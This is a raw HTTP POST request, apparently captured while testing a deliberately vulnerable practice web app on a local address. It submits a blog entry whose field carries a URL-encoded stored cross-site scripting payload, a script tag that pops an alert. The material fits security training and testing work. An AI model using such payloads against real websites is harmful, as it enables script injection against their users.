POST /owapp/index.php?page=add-to-your-blog.php HTTP/1.1
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept-Language: en-US,en;q=0.5
Host: 192.168.1.175
Referer: http://192.168.1.175/owapp/index.php?page=add-to-your-blog.php
Content-Type: application/x-www-form-urlencoded
Cookie: neowize_user={2id2:24eeb5bf2-24ac-4912-a67b-99c067e645612C2version2:1.2}; PHPSESSID=6v3ecj1ffqislv49q1vfrjo2t5; showhints=0
Content-Length: 110

csrf-token=&blog_entry=%3Cscript%3Ealert%282%29%3C%2Fscript&add-to-your-blog-php-submit-button=Save+Blog+Entry